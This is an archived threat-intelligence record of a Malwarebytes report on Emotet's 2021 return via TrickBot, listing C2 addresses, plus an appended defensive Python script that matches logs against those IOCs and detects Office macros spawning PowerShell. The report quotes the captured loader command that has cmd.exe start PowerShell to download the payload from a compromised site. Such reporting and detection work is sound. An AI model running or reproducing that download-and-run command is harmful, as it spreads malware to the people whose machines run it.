{
	"id": "13998059-f79a-4d26-b6f9-20ffe0b0eabd",
	"created_at": "2026-04-06T00:08:10.310174Z",
	"updated_at": "2026-04-10T13:11:39.461273Z",
	"deleted_at": null,
	"sha1_hash": "80a32303a5e50822fd838ed2df158d471e096fca",
	"title": "TrickBot helps Emotet come back from the dead",
	"llm_title": "",
	"authors": "Mark Stockley",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 689225,
	"plain_text": "TrickBot helps Emotet come back from the dead\r\nBy Mark Stockley\r\nPublished: 2021-11-15 · Archived: 2026-04-05 17:55:11 UTC\r\nProbably one of the best-known threats of the past several years, Emotet has always been under intense scrutiny from the infosec community. On several occasions it appeared to take an early retirement, but each time it came back.\r\nHowever, when multiple law enforcement agencies seized control of its botnet and took it down in January 2021, confidence was much higher that Emotet and the people behind it had finally called it quits. Not only had the infrastructure been dismantled, but previously infected computers had received a special update that would effectively remove the malware on a specific date.\r\nOut of the woods again\r\nOn November 15, security researchers who have tracked Emotet announced that the threat was back. Emotet’s long-time partner in crime TrickBot was helping it out by using already infected machines to download the new Emotet binary.\r\nTo prove this was no hiccup, malspam campaigns distributing Emotet resumed as well, with the classic Office document lures containing macros.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/\r\nThese documents, with extension .doc(m) and .xls(m), are the initial loader: they call out to one of several compromised websites to retrieve the Emotet payload proper using the following command (reproduced as captured, with path separators restored; the URL is truncated in the archived copy):\r\nC:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\cmd.exe /c start /B powershell $dfkj=$strs=http://visteme.mx/sho\r\nAfter execution, Emotet will talk to its command and control (C2) servers and await further instructions.\r\nA return of malspam waves and ransomware?\r\nSo far everything indicates that Emotet has restarted its successful enterprise. We should expect malspam campaigns to ramp up in the coming weeks.\r\nIn the past month there have been a number of arrests of ransomware operators, along with the creation of task forces collaborating across borders. The return of Emotet could very well mean an increase in ransomware attacks.\r\nMalwarebytes users are already protected against Emotet thanks to our anti-exploit layer blocking the malicious documents from downloading their payload.\r\nIndicators of Compromise (IOCs)\r\nEmotet C2 servers:\r\n103[.]75[.]201[.]2\r\n103[.]8[.]26[.]102\r\n103[.]8[.]26[.]103\r\n104[.]251[.]214[.]46\r\n138[.]185[.]72[.]26\r\n178[.]79[.]147[.]66\r\n185[.]184[.]25[.]237\r\n188[.]93[.]125[.]116\r\n195[.]154[.]133[.]20\r\n207[.]38[.]84[.]195\r\n210[.]57[.]217[.]132\r\n212[.]237[.]5[.]209\r\n45[.]118[.]135[.]203\r\n45[.]142[.]114[.]231\r\n45[.]76[.]176[.]10\r\n51[.]68[.]175[.]8\r\n58[.]227[.]42[.]236\r\n66[.]42[.]55[.]5\r\n81[.]0[.]236[.]93\r\n94[.]177[.]248[.]64\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/"
	],
	"report_names": [
		"trickbot-helps-emotet-come-back-from-the-dead"
	],
	"threat_actors": [],
	"ts_created_at": 1775434090,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/80a32303a5e50822fd838ed2df158d471e096fca.pdf",
		"text": "https://archive.orkl.eu/80a32303a5e50822fd838ed2df158d471e096fca.txt",
		"img": "https://archive.orkl.eu/80a32303a5e50822fd838ed2df158d471e096fca.jpg"
	}
}
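The record above carries two things a defender can act on: the defanged C2 list, and the loader chain (Office macro spawning cmd.exe, which starts PowerShell in the background). The following is an added example, not code from the Malwarebytes post or from Malwarebytes, showing how to refang that IOC list into a lookup set, run it over connection-log lines, and flag the Office-to-cmd.exe-to-PowerShell process chain. The log line format, the event field names, and all sample log lines and events are constructed for the example and are assumptions; only the IP addresses come from the post.

```python
"""Added example, not code from the Malwarebytes post: refang the post's
defanged C2 list into a lookup set, check constructed connection-log lines
against it, and flag the Office -> cmd.exe -> PowerShell launch chain that
the loader command quoted in the post shows. Log and event field names are
assumptions of this example."""
import ipaddress
import re

# Subset of the C2 addresses listed in the post, kept in the defanged form
# the post uses. The blank line and the comment line exercise the parser.
EMOTET_C2_DEFANGED = """
103[.]75[.]201[.]2
103[.]8[.]26[.]102
104[.]251[.]214[.]46
138[.]185[.]72[.]26
45[.]118[.]135[.]203
# not an address, must be skipped
"""


def refang(indicator):
    """Undo common defanging: '103[.]75[.]201[.]2' -> '103.75.201.2', 'hxxp' -> 'http'."""
    return (indicator.strip()
            .replace("[.]", ".")
            .replace("(.)", ".")
            .replace("hxxp", "http"))


def load_ip_iocs(text):
    """Parse a block of defanged IPs into a set of normalised IP strings.
    Lines that do not parse as an IP literal are dropped rather than
    silently becoming a bogus indicator that never matches anything."""
    iocs = set()
    for line in text.splitlines():
        candidate = refang(line)
        if not candidate:
            continue
        try:
            iocs.add(str(ipaddress.ip_address(candidate)))
        except ValueError:
            continue
    return iocs


# Constructed connection-log format: key=value pairs, one event per line.
HOST_RE = re.compile(r"\bhost=(\S+)")
DST_RE = re.compile(r"\bdst=(\S+)")


def match_connections(log_lines, iocs):
    """Return (host, destination) pairs whose destination is on the IOC list.
    Both sides go through ipaddress so the comparison uses one textual form
    (matters for IPv6 shorthand; for IPv4 it mainly rejects junk values)."""
    hits = []
    for line in log_lines:
        host_m, dst_m = HOST_RE.search(line), DST_RE.search(line)
        if not (host_m and dst_m):
            continue
        try:
            dst = str(ipaddress.ip_address(dst_m.group(1)))
        except ValueError:
            continue  # hostnames are out of scope for an IP-only list
        if dst in iocs:
            hits.append((host_m.group(1), dst))
    return hits


OFFICE_PARENTS = {"winword.exe", "excel.exe"}


def is_office_macro_launch(event):
    """Flag cmd.exe spawned by Word or Excel with a command line that chains
    into PowerShell, the shape of the loader command quoted in the post
    (cmd.exe /c start /B powershell ...). Field names mirror a Sysmon-style
    process-creation event and are an assumption of this example."""
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    image = event.get("image", "").lower().rsplit("\\", 1)[-1]
    cmdline = event.get("command_line", "").lower()
    return parent in OFFICE_PARENTS and image == "cmd.exe" and "powershell" in cmdline


# Constructed sample data for the demo (RFC 5737 addresses for the benign rows).
SAMPLE_NETLOG = [
    "ts=2021-11-15T10:02:11Z host=WS-042 proto=tcp dst=103.75.201.2 dport=8080 action=allow",
    "ts=2021-11-15T10:02:12Z host=WS-042 proto=tcp dst=192.0.2.10 dport=443 action=allow",
    "ts=2021-11-15T10:05:40Z host=WS-017 proto=tcp dst=45.118.135.203 dport=443 action=allow",
    "ts=2021-11-15T10:06:01Z host=WS-017 proto=udp dst=internal-dns dport=53 action=allow",
]
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"C:\Windows\System32\cmd.exe /c start /B powershell $dfkj=$strs=..."},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"C:\Windows\System32\cmd.exe /c dir"},
]

if __name__ == "__main__":
    iocs = load_ip_iocs(EMOTET_C2_DEFANGED)
    print("network hits:", match_connections(SAMPLE_NETLOG, iocs))
    print("office launch chain:", [is_office_macro_launch(e) for e in SAMPLE_EVENTS])
```

Two caveats worth keeping in mind when using this on real telemetry: an IP list from a news post ages quickly, so treat a hit as a lead to pivot on rather than a verdict, and the process-chain check is deliberately narrow (Word or Excel as direct parent of cmd.exe with PowerShell in the command line) and will miss loaders that use a different intermediary.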